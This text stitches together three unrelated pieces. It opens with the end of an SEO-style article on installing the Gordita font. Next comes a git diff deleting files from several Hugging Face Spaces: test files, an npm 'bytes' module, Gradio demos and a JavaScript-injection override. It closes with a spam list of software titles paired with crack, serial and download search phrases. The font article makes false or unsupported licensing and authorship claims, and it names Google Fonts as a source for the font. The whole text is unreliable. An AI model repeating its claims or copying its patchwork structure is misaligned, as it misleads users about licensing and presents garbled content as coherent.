          -

          To embed Gordita font with @font-face, you need to follow these steps:

          -
            -
          1. Upload the font files to your server in a folder that is accessible by your website.
          2. -
          3. Add a CSS code snippet to your stylesheet that links to the font files and defines their properties. For example:
          4. -
            @font-face    font-family: 'Gordita';   src: url('fonts/gordita-regular.otf') format('opentype'),        url('fonts/gordita-regular.ttf') format('truetype'),        url('fonts/gordita-regular.woff') format('woff');   font-weight: normal;   font-style: normal;  /* Use Gordita font for headings */ h1, h2, h3    font-family: 'Gordita', sans-serif;  
            -
          5. Use Gordita font for your website elements by specifying its name in the CSS property font-family. For example:
          6. -
            p    font-family: 'Gordita', sans-serif;  
            -
          -

          Use a Webfont Service

          -

          This option allows you to use a third-party service that hosts and delivers the font files for your website. You do not need to have a license for this option, as it is provided by the service provider. Here are some advantages and disadvantages of this option:

          -
            -
          • Advantages: You do not need to have technical skills or knowledge to implement this option. You also do not need to worry about the license, formats, fallbacks, or performance of the font files. You can easily access and manage the fonts from a user-friendly interface.
          • -
          • Disadvantages: You have less control over the font files and how they are displayed on your website. You also depend on the service provider for the availability and quality of the font files. You may also face some limitations or costs depending on the service provider.
          • -
          -

          To use a webfont service for Gordita font, you need to follow these steps:

          -
            -
          1. Choose a webfont service that offers Gordita font. Some of the popular webfont services are Google Fonts, Fonts.com + SkyFonts, Adobe Fonts, and Fontspring.
          2. -
          3. Sign up for an account and create a project for your website.
          4. -
          5. Select Gordita font and the styles and weights that you want to use for your website.
          6. -
          7. Copy and paste the code snippet that the service provider gives you to your website's <head> section. For example:
          8. -
            <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Gordita:400,400i,700,700i"> 
            -
          9. Use Gordita font for your website elements by specifying its name in the CSS property font-family. For example:
          10. -
            p    font-family: 'Gordita', sans-serif;  
            -
          -

          Conclusion and FAQs

          -

          Gordita font is a beautiful and versatile sans serif typeface that can enhance your web design projects. It has a minimal, geometric, and friendly appearance that can suit various purposes and styles. It also has many features and characteristics that can make your website more readable and attractive. You can download Gordita font for free from different sources online, install it on your computer, and use it on your website with ease. Whether you choose to embed the font with @font-face or use a webfont service, you can enjoy the benefits of Gordita font on your website.

          -

          Here are some frequently asked questions about Gordita font:

          -
            -
          • Q: What is the license of Gordita font?
          • -
          • A: Gordita font is licensed under the SIL Open Font License (OFL), which means that you can use it for free for both personal and commercial projects. However, you must not sell or distribute the font files without permission from the author. You must also keep the original license and documentation files with the font files.
          • -
          • Q: How can I customize Gordita font for my website?
          • -
          • A: You can customize Gordita font for your website by using CSS properties such as font-size, font-weight, font-style, color, text-align, text-transform, letter-spacing, line-height, and more. You can also use OpenType features such as alternate glyphs, fractions, case sensitive forms, small figures, arrows, symbols, old style and tabular figures by using CSS properties such as font-feature-settings or font-variant.
          • -
          • Q: How can I pair Gordita font with other fonts for my website?
          • -
          • A: You can pair Gordita font with other fonts for your website by following some basic principles of typography, such as contrast, harmony, hierarchy, and balance. You can also use online tools such as FontPair or Typ.io to find suitable font combinations for Gordita font.
          • -
          • Q: How can I optimize Gordita font for my website?
          • -
          • A: You can optimize Gordita font for your website by following some best practices of web typography, such as choosing the right format and weight, using a fallback font, setting a proper line length and spacing, adjusting the vertical rhythm and alignment, testing the readability and accessibility, and using webfont performance tools such as Web Font Loader or Font Face Observer.
          • -
          • Q: Where can I find more information about Gordita font?
          • -
          • A: You can find more information about Gordita font on its official website: https://gorditafont.com/. There you can learn more about the history, design, features, and usage of Gordita font. You can also contact the author or follow him on social media for updates and feedback. You can also check out some of his other fonts, such as Brandon Grotesque, Brandon Text, and Brandon Printed.
          • -
          -

          I hope you enjoyed this article and learned how to download Gordita font for your website. If you have any questions or comments, please feel free to leave them below. Thank you for reading and happy designing!

          401be4b1e0
          -
          -
          \ No newline at end of file diff --git a/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py b/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py deleted file mode 100644 index 28fbc4f1a0ebaf41b56947b767958ae696e75eec..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py +++ /dev/null @@ -1,203 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product -import math -import random - -import pytest -import torch -from torch import nn - -from audiocraft.modules import ( - NormConv1d, - NormConvTranspose1d, - StreamableConv1d, - StreamableConvTranspose1d, - pad1d, - unpad1d, -) - - -def test_get_extra_padding_for_conv1d(): - # TODO: Implement me! - pass - - -def test_pad1d_zeros(): - x = torch.randn(1, 1, 20) - - xp1 = pad1d(x, (0, 5), mode='constant', value=0.) - assert xp1.shape[-1] == 25 - xp2 = pad1d(x, (5, 5), mode='constant', value=0.) - assert xp2.shape[-1] == 30 - xp3 = pad1d(x, (0, 0), mode='constant', value=0.) - assert xp3.shape[-1] == 20 - xp4 = pad1d(x, (10, 30), mode='constant', value=0.) - assert xp4.shape[-1] == 60 - - with pytest.raises(AssertionError): - pad1d(x, (-1, 0), mode='constant', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (0, -1), mode='constant', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (-1, -1), mode='constant', value=0.) - - -def test_pad1d_reflect(): - x = torch.randn(1, 1, 20) - - xp1 = pad1d(x, (0, 5), mode='reflect', value=0.) - assert xp1.shape[-1] == 25 - xp2 = pad1d(x, (5, 5), mode='reflect', value=0.) - assert xp2.shape[-1] == 30 - xp3 = pad1d(x, (0, 0), mode='reflect', value=0.) - assert xp3.shape[-1] == 20 - xp4 = pad1d(x, (10, 30), mode='reflect', value=0.) - assert xp4.shape[-1] == 60 - - with pytest.raises(AssertionError): - pad1d(x, (-1, 0), mode='reflect', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (0, -1), mode='reflect', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (-1, -1), mode='reflect', value=0.) - - -def test_unpad1d(): - x = torch.randn(1, 1, 20) - - u1 = unpad1d(x, (5, 5)) - assert u1.shape[-1] == 10 - u2 = unpad1d(x, (0, 5)) - assert u2.shape[-1] == 15 - u3 = unpad1d(x, (5, 0)) - assert u3.shape[-1] == 15 - u4 = unpad1d(x, (0, 0)) - assert u4.shape[-1] == x.shape[-1] - - with pytest.raises(AssertionError): - unpad1d(x, (-1, 0)) - - with pytest.raises(AssertionError): - unpad1d(x, (0, -1)) - - with pytest.raises(AssertionError): - unpad1d(x, (-1, -1)) - - -class TestNormConv1d: - - def test_norm_conv1d_modules(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out, kernel_size, stride = 1, 4, 1 - expected_out_length = int((T - kernel_size) / stride + 1) - wn_conv = NormConv1d(C, 1, kernel_size=4, norm='weight_norm') - gn_conv = NormConv1d(C, 1, kernel_size=4, norm='time_group_norm') - nn_conv = NormConv1d(C, 1, kernel_size=4, norm='none') - - assert isinstance(wn_conv.norm, nn.Identity) - assert isinstance(wn_conv.conv, nn.Conv1d) - - assert isinstance(gn_conv.norm, nn.GroupNorm) - assert isinstance(gn_conv.conv, nn.Conv1d) - - assert isinstance(nn_conv.norm, nn.Identity) - assert isinstance(nn_conv.conv, nn.Conv1d) - - for conv_layer in [wn_conv, gn_conv, nn_conv]: - out = conv_layer(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] - - -class TestNormConvTranspose1d: - - def test_normalizations(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out, kernel_size, stride = 1, 4, 1 - expected_out_length = (T - 1) * stride + (kernel_size - 1) + 1 - - wn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='weight_norm') - gn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='time_group_norm') - nn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='none') - - assert isinstance(wn_convtr.norm, nn.Identity) - assert isinstance(wn_convtr.convtr, nn.ConvTranspose1d) - - assert isinstance(gn_convtr.norm, nn.GroupNorm) - assert isinstance(gn_convtr.convtr, nn.ConvTranspose1d) - - assert isinstance(nn_convtr.norm, nn.Identity) - assert isinstance(nn_convtr.convtr, nn.ConvTranspose1d) - - for convtr_layer in [wn_convtr, gn_convtr, nn_convtr]: - out = convtr_layer(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] - - -class TestStreamableConv1d: - - def get_streamable_conv1d_output_length(self, length, kernel_size, stride, dilation): - # StreamableConv1d internally pads to make sure that the last window is full - padding_total = (kernel_size - 1) * dilation - (stride - 1) - n_frames = (length - kernel_size + padding_total) / stride + 1 - ideal_length = (math.ceil(n_frames) - 1) * stride + (kernel_size - padding_total) - return ideal_length // stride - - def test_streamable_conv1d(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - C_out = 1 - - # conv params are [(kernel_size, stride, dilation)] - conv_params = [(4, 1, 1), (4, 2, 1), (3, 1, 3), (10, 5, 1), (3, 2, 3)] - for causal, (kernel_size, stride, dilation) in product([False, True], conv_params): - expected_out_length = self.get_streamable_conv1d_output_length(T, kernel_size, stride, dilation) - sconv = StreamableConv1d(C, C_out, kernel_size=kernel_size, stride=stride, dilation=dilation, causal=causal) - out = sconv(t0) - assert isinstance(out, torch.Tensor) - print(list(out.shape), [N, C_out, expected_out_length]) - assert list(out.shape) == [N, C_out, expected_out_length] - - -class TestStreamableConvTranspose1d: - - def get_streamable_convtr1d_output_length(self, length, kernel_size, stride): - padding_total = (kernel_size - stride) - return (length - 1) * stride - padding_total + (kernel_size - 1) + 1 - - def test_streamable_convtr1d(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out = 1 - - with pytest.raises(AssertionError): - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=False, trim_right_ratio=0.5) - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=True, trim_right_ratio=-1.) - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=True, trim_right_ratio=2) - - # causal params are [(causal, trim_right)] - causal_params = [(False, 1.0), (True, 1.0), (True, 0.5), (True, 0.0)] - # conv params are [(kernel_size, stride)] - conv_params = [(4, 1), (4, 2), (3, 1), (10, 5)] - for ((causal, trim_right_ratio), (kernel_size, stride)) in product(causal_params, conv_params): - expected_out_length = self.get_streamable_convtr1d_output_length(T, kernel_size, stride) - sconvtr = StreamableConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, - causal=causal, trim_right_ratio=trim_right_ratio) - out = sconvtr(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js deleted file mode 100644 index 6f2d0f89e1258564bad95175159e1d8a6abd9ddf..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js +++ /dev/null @@ -1,170 +0,0 @@ -/*! - * bytes - * Copyright(c) 2012-2014 TJ Holowaychuk - * Copyright(c) 2015 Jed Watson - * MIT Licensed - */ - -'use strict'; - -/** - * Module exports. - * @public - */ - -module.exports = bytes; -module.exports.format = format; -module.exports.parse = parse; - -/** - * Module variables. - * @private - */ - -var formatThousandsRegExp = /\B(?=(\d{3})+(?!\d))/g; - -var formatDecimalsRegExp = /(?:\.0*|(\.[^0]+)0+)$/; - -var map = { - b: 1, - kb: 1 << 10, - mb: 1 << 20, - gb: 1 << 30, - tb: Math.pow(1024, 4), - pb: Math.pow(1024, 5), -}; - -var parseRegExp = /^((-|\+)?(\d+(?:\.\d+)?)) *(kb|mb|gb|tb|pb)$/i; - -/** - * Convert the given value in bytes into a string or parse to string to an integer in bytes. - * - * @param {string|number} value - * @param {{ - * case: [string], - * decimalPlaces: [number] - * fixedDecimals: [boolean] - * thousandsSeparator: [string] - * unitSeparator: [string] - * }} [options] bytes options. - * - * @returns {string|number|null} - */ - -function bytes(value, options) { - if (typeof value === 'string') { - return parse(value); - } - - if (typeof value === 'number') { - return format(value, options); - } - - return null; -} - -/** - * Format the given value in bytes into a string. - * - * If the value is negative, it is kept as such. If it is a float, - * it is rounded. - * - * @param {number} value - * @param {object} [options] - * @param {number} [options.decimalPlaces=2] - * @param {number} [options.fixedDecimals=false] - * @param {string} [options.thousandsSeparator=] - * @param {string} [options.unit=] - * @param {string} [options.unitSeparator=] - * - * @returns {string|null} - * @public - */ - -function format(value, options) { - if (!Number.isFinite(value)) { - return null; - } - - var mag = Math.abs(value); - var thousandsSeparator = (options && options.thousandsSeparator) || ''; - var unitSeparator = (options && options.unitSeparator) || ''; - var decimalPlaces = (options && options.decimalPlaces !== undefined) ? options.decimalPlaces : 2; - var fixedDecimals = Boolean(options && options.fixedDecimals); - var unit = (options && options.unit) || ''; - - if (!unit || !map[unit.toLowerCase()]) { - if (mag >= map.pb) { - unit = 'PB'; - } else if (mag >= map.tb) { - unit = 'TB'; - } else if (mag >= map.gb) { - unit = 'GB'; - } else if (mag >= map.mb) { - unit = 'MB'; - } else if (mag >= map.kb) { - unit = 'KB'; - } else { - unit = 'B'; - } - } - - var val = value / map[unit.toLowerCase()]; - var str = val.toFixed(decimalPlaces); - - if (!fixedDecimals) { - str = str.replace(formatDecimalsRegExp, '$1'); - } - - if (thousandsSeparator) { - str = str.split('.').map(function (s, i) { - return i === 0 - ? s.replace(formatThousandsRegExp, thousandsSeparator) - : s - }).join('.'); - } - - return str + unitSeparator + unit; -} - -/** - * Parse the string value into an integer in bytes. - * - * If no unit is given, it is assumed the value is in bytes. - * - * @param {number|string} val - * - * @returns {number|null} - * @public - */ - -function parse(val) { - if (typeof val === 'number' && !isNaN(val)) { - return val; - } - - if (typeof val !== 'string') { - return null; - } - - // Test if the string passed is valid - var results = parseRegExp.exec(val); - var floatValue; - var unit = 'b'; - - if (!results) { - // Nothing could be extracted from the given string - floatValue = parseInt(val, 10); - unit = 'b' - } else { - // Retrieve the value and the unit - floatValue = parseFloat(results[1]); - unit = results[4].toLowerCase(); - } - - if (isNaN(floatValue)) { - return null; - } - - return Math.floor(map[unit] * floatValue); -} diff --git a/spaces/fiyen/YangyangChatGPT/modules/overwrites.py b/spaces/fiyen/YangyangChatGPT/modules/overwrites.py deleted file mode 100644 index bfcd4d01b7d7bec1184a8d09113933bca860530b..0000000000000000000000000000000000000000 --- a/spaces/fiyen/YangyangChatGPT/modules/overwrites.py +++ /dev/null @@ -1,56 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html - -from modules.presets import * -from modules.llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, y: List[Tuple[str | None, str | None]] -) -> List[Tuple[str | None, str | None]]: - """ - Parameters: - y: List of tuples representing the message and response pairs. Each message and response should be a string, which may be in Markdown format. - Returns: - List of tuples representing the message and response. Each message and response will be a string of HTML. - """ - if y is None or y == []: - return [] - user, bot = y[-1] - if not detect_converted_mark(user): - user = convert_asis(user) - if not detect_converted_mark(bot): - bot = convert_mdtext(bot) - y[-1] = (user, bot) - return y - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py b/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py deleted file mode 100644 index 957b8d9ab879493ea5b6072dbe5acdf1d6c52524..0000000000000000000000000000000000000000 --- a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py +++ /dev/null @@ -1,33 +0,0 @@ -import gradio as gr - - -def calculator(num1, operation, num2): - if operation == "add": - return num1 + num2 - elif operation == "subtract": - return num1 - num2 - elif operation == "multiply": - return num1 * num2 - elif operation == "divide": - return num1 / num2 - - -with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - num_1 = gr.Number(value=4) - operation = gr.Radio(["add", "subtract", "multiply", "divide"]) - num_2 = gr.Number(value=0) - submit_btn = gr.Button(value="Calculate") - with gr.Column(): - result = gr.Number() - - submit_btn.click(calculator, inputs=[num_1, operation, num_2], outputs=[result]) - examples = gr.Examples(examples=[[5, "add", 3], - [4, "divide", 2], - [-4, "multiply", 2.5], - [0, "subtract", 1.2]], - inputs=[num_1, operation, num_2]) - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py b/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py deleted file mode 100644 index 482c9908994cd229c1ac7d52f3877f04c5813848..0000000000000000000000000000000000000000 --- a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py +++ /dev/null @@ -1,26 +0,0 @@ -import random -import gradio as gr - -def chat(message, history): - history = history or [] - message = message.lower() - if message.startswith("how many"): - response = random.randint(1, 10) - elif message.startswith("how"): - response = random.choice(["Great", "Good", "Okay", "Bad"]) - elif message.startswith("where"): - response = random.choice(["Here", "There", "Somewhere"]) - else: - response = "I don't know" - history.append((message, response)) - return history, history - -chatbot = gr.Chatbot().style(color_map=("green", "pink")) -demo = gr.Interface( - chat, - ["text", "state"], - [chatbot, "state"], - allow_flagging="never", -) -if __name__ == "__main__": - demo.launch() diff --git a/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py b/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py deleted file mode 100644 index 1db6b1d08dca41d827632377764e2e5407c0c88d..0000000000000000000000000000000000000000 --- a/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/flair/ner-english-ontonotes-large").launch() \ No newline at end of file diff --git a/spaces/generativeai/bestpics-ms-image-similarity/app.py b/spaces/generativeai/bestpics-ms-image-similarity/app.py deleted file mode 100644 index 2ebca92f9639c9e0b84139bc1a050754498bd915..0000000000000000000000000000000000000000 --- a/spaces/generativeai/bestpics-ms-image-similarity/app.py +++ /dev/null @@ -1,28 +0,0 @@ -import os -import gradio as gr -from image_similarity import ImageSimilarity -from services.aws_service import AwsService -from dotenv import load_dotenv - -load_dotenv() - -def check_image_similarity(photo_shoot_id): - folder = "PhotoShoots/" + str(photo_shoot_id) + "/Croppeds" - files = AwsService.get_files_from_s3(os.environ.get('AWS_S3_BUCKET'), folder) - - images = [] - for file in files: - images.append(AwsService.get_image_from_s3(os.environ.get('AWS_S3_BUCKET'), file['Key'])) - - if len(images) == 0: - return [] - - return ImageSimilarity(1).check(images) - -iface = gr.Interface( - fn=check_image_similarity, - inputs=[gr.Textbox(lines=1, placeholder="Photo Shoot ID")], - outputs="text" -) - -iface.launch() \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py deleted file mode 100644 index 93c97640d4b9ed088ca82cfe03e6efebfcfa9dbf..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py +++ /dev/null @@ -1,107 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from functools import partial - -import torch - -TORCH_VERSION = torch.__version__ - - -def is_rocm_pytorch() -> bool: - is_rocm = False - if TORCH_VERSION != 'parrots': - try: - from torch.utils.cpp_extension import ROCM_HOME - is_rocm = True if ((torch.version.hip is not None) and - (ROCM_HOME is not None)) else False - except ImportError: - pass - return is_rocm - - -def _get_cuda_home(): - if TORCH_VERSION == 'parrots': - from parrots.utils.build_extension import CUDA_HOME - else: - if is_rocm_pytorch(): - from torch.utils.cpp_extension import ROCM_HOME - CUDA_HOME = ROCM_HOME - else: - from torch.utils.cpp_extension import CUDA_HOME - return CUDA_HOME - - -def get_build_config(): - if TORCH_VERSION == 'parrots': - from parrots.config import get_build_info - return get_build_info() - else: - return torch.__config__.show() - - -def _get_conv(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.conv import _ConvNd, _ConvTransposeMixin - else: - from torch.nn.modules.conv import _ConvNd, _ConvTransposeMixin - return _ConvNd, _ConvTransposeMixin - - -def _get_dataloader(): - if TORCH_VERSION == 'parrots': - from torch.utils.data import DataLoader, PoolDataLoader - else: - from torch.utils.data import DataLoader - PoolDataLoader = DataLoader - return DataLoader, PoolDataLoader - - -def _get_extension(): - if TORCH_VERSION == 'parrots': - from parrots.utils.build_extension import BuildExtension, Extension - CppExtension = partial(Extension, cuda=False) - CUDAExtension = partial(Extension, cuda=True) - else: - from torch.utils.cpp_extension import (BuildExtension, CppExtension, - CUDAExtension) - return BuildExtension, CppExtension, CUDAExtension - - -def _get_pool(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.pool import (_AdaptiveAvgPoolNd, - _AdaptiveMaxPoolNd, _AvgPoolNd, - _MaxPoolNd) - else: - from torch.nn.modules.pooling import (_AdaptiveAvgPoolNd, - _AdaptiveMaxPoolNd, _AvgPoolNd, - _MaxPoolNd) - return _AdaptiveAvgPoolNd, _AdaptiveMaxPoolNd, _AvgPoolNd, _MaxPoolNd - - -def _get_norm(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.batchnorm import _BatchNorm, _InstanceNorm - SyncBatchNorm_ = torch.nn.SyncBatchNorm2d - else: - from torch.nn.modules.instancenorm import _InstanceNorm - from torch.nn.modules.batchnorm import _BatchNorm - SyncBatchNorm_ = torch.nn.SyncBatchNorm - return _BatchNorm, _InstanceNorm, SyncBatchNorm_ - - -_ConvNd, _ConvTransposeMixin = _get_conv() -DataLoader, PoolDataLoader = _get_dataloader() -BuildExtension, CppExtension, CUDAExtension = _get_extension() -_BatchNorm, _InstanceNorm, SyncBatchNorm_ = _get_norm() -_AdaptiveAvgPoolNd, _AdaptiveMaxPoolNd, _AvgPoolNd, _MaxPoolNd = _get_pool() - - -class SyncBatchNorm(SyncBatchNorm_): - - def _check_input_dim(self, input): - if TORCH_VERSION == 'parrots': - if input.dim() < 2: - raise ValueError( - f'expected at least 2D input (got {input.dim()}D input)') - else: - super()._check_input_dim(input) diff --git a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py b/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py deleted file mode 100644 index 46327c35a041683dd24b6522ff75a4ac9559d60b..0000000000000000000000000000000000000000 --- a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .model import PAN diff --git a/spaces/gordonchan/h2oo/README.md b/spaces/gordonchan/h2oo/README.md deleted file mode 100644 index 185a57f8cfa251bf44e42b6713e8a47459120efb..0000000000000000000000000000000000000000 --- a/spaces/gordonchan/h2oo/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: H2ogpt Chatbot -emoji: 📚 -colorFrom: yellow -colorTo: yellow -sdk: gradio -sdk_version: 3.35.2 -app_file: gen.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md b/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md deleted file mode 100644 index e37f872e38d23d8cf53c3a76d29f9bab1479724b..0000000000000000000000000000000000000000 --- a/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md +++ /dev/null @@ -1,5 +0,0 @@ - -

          brickhouse betty downloads Macromedia Fireworks 8 MAC download sentimental shooter Account Express 2.0d rihanna million miles away download Right Hemisphere Deep UV 1.3 cavalier workshop manual download Magix Audio Cleaning Lab Deluxe 10 download detachable penis Adobe Contribute CS3 software datagate Ashlar-Vellum Cobalt 8.2 download badder adder NETGATE Spy Emergency 2008 5.0 main street program 03264 Convert Html To Image V2.0 turbotax estimated tax program FTP Now V2.6 fms helicopter model download CMJ Designs DaySmart 6.0.7 datalogic consultants ltd professional software development DVDFab Platinum 4.1 Multilingual download grey revell BurnAware Express 2.0 champlain college radiological technology program Fotis Clean Mem XP V9.0 download ayumi hamasaki moments single IWellsoft Power ISO Maker 1.7 abit is7 downloads Cinema Craft Encoder SP2 1.0 ddp program north bay Motion Studio 4.0 data cable software for vx9900 PC Video Converter Studio 5.0 download verizon mpt Steelray Project Viewer 3.1 sound blaster 32 pnp driver download BitDefender SpamDeny 8.0 rn to paramedic program in nh Ashampoo Burning Studio 7.2 durch den monsun free download Rosetta IT Solutions Business Planner Pro 8.0 danger hiptop ringtone software Privacy Shield V3.0 equipment inventory ald software TypingMaster Pro 7.0 kurzweil program gets stuck Office 2007 Enterprise PL kqed program listings Mp3 Splitter And Joiner Pro V3.4 nsu counseling master s program Apollo WMV ASF ASX To DVD Burner 3.8 two moons mmo download OrgScheduler 4.5 leapster software no boxes Steinberg MyMp3PRO 5.0 technical itch hex download WinLock Remote Administrator 1.4 tma designated provider program WinASO Registry Optimizer V3.1 s m lockridge free video downloads Sony Vegas Movie Studio Platinum Edition 8.0 download pagan ultima 8 free Pop-Software MPEG To IPod Converter 1.0 absolutely free anti virus downloads win98 Xpert-Design Xpert-Timer 2007 1.5 download avernum iv cracks hacks Bentley StormCad XM 05 pavor virus AutoCAD Architecture 2009 32 Bit dragonfable gold hack program EZ Backup Windows Calendar Premium memorex traveldrive driver downloads BreezeBrowser Pro 1.9 portege 7200ct downloads Geo Log Analyzer1.48 help desk software carmarthenshire 20-20 Kitchen Design 6.1 distribuci n software empresa Future Decks 1.3 download hpdirector Ektron EWebEditPro 5.1.0.38 navman f20 map free download CD Eject Tool 2.7 totally free yahtzee game download Comodo Firewall Pro 3.0 download supervoice pro 4 NewLive All Media Fixer Pro V8.5 simple popstation download Focus Photoeditor 5.2 canon mp300 software BIAS Sound Soap DX VST 1.12 real estate appraiser software aci Website Layout Maker 2.0 ubuntu radeon 9800 video driver download VideoVista Professional Edition 3.0 cyberdefender virus Aigo DVD To Zune Converter 2.0 nfsw download forums Kristanix Software File Renamer Deluxe 2.4 lorena couture free video download Sonic CinePlayer 1.5 axxion program Eeasy DiSk Ddrive Ssafe-Gguard 2.0 software mcas math improvements Bid-n-Invoice Office Cleaning 2.2 budget programs plus susan ott Discovery Scientific Breeze Professional Edition 5.6 ti-83 quadratic formula program Autodesk Lustre 2009 trip program trs illinois Adobe Acrobat 8 Professional MAC freeserials spyware virus Whizzo CleanSuite Ultra 1.1 yardi software EPDF Advanced DWG To Image Workshop 4.1 fuqua hall recovery program atlanta Fund Manager Advisor 7.8 msdn vl iso downloads Eztoo WMV Video Converter 2.0 free download all saints bootie call Comfort On-Screen Keyboard V2.1 update blinder download Blumentals WeBuilder 2008 9.0 security update for windows download kb925902 Electric Image Amorphium 3.0 take back your mink karaoke download HTML Meta Data Editor 1.5 winanti virus removal SurfControl Instant Message Filter 2.5 securom emulation download Symantec Norton Ghost 14.0 Norton Ghost Recovery Disk download skier simulator SpeedConnect Internet Accelerator 7.5 download irix 6.5 fortran Tag Clinic 4.3 download acetoneiso EZ Backup IncrediMail Premium peoplepc online upgrades software Fresh UI V7.4 free mp4a file downloads Zealot All Video Joiner 4.1 zaner bloser writing program VBConversions VB.Net To C Sharp Converter 2.2 hyperstudio download Aigo DVD To PSP Converter 2.0 son-rise program for autism Parallels Workstation 2.1 livewire stock market trading software Presto PageMaker Pro 8.2 bootable nfts anti-virus software Autodesk Maya 8.5 om kalthoum download Super DVD Creator V9.50 expressit download Angel Software Resize Pictures Plus 3.2 cannot download jnlp Norton Partition Magic 8.0 download free mummers dance mp3 Pipisoft Flash Favorite 1.8 outer banks honorary ranger program IndigoStar MicroWeb 1.3 dupe elimination software Perforce 2006 new york presbyterian hospital lifeline program Strata 3D CX 5.0 download spelljammer DVBViewer 3.9 Multilingual rock of ages granite 3-p program Genie Backup Manager Professional 8.0 colbert correspondents dinner download GForce Software Minimonsta RTAS VSTi 1.06 neopets blade autobuyer download Intervideo Mediaone Gallery Platinum 2.0 download ogc aimbot Pocket CHM Professional 5.9 bitware free download Perpetualbudget System 4.5 adobe acrobat 7.0.9 download Paragon Total Defrag 2009 channelwave software NomadFactory Bluetubes VST 2.0 lode runner the legend returns downloads ABC Windows Live Mail Backup 1.5 full moon o sagashite manga download StampManage 2009.1 free digital pipe organ software StreamingStar HiRecorder 1.0 t5 software dst update TingleSoft WMV Converter 1.8 cakewalk software pyro windows Revisionfx Reelsmart Motion Blur 3.2 For Adobe After 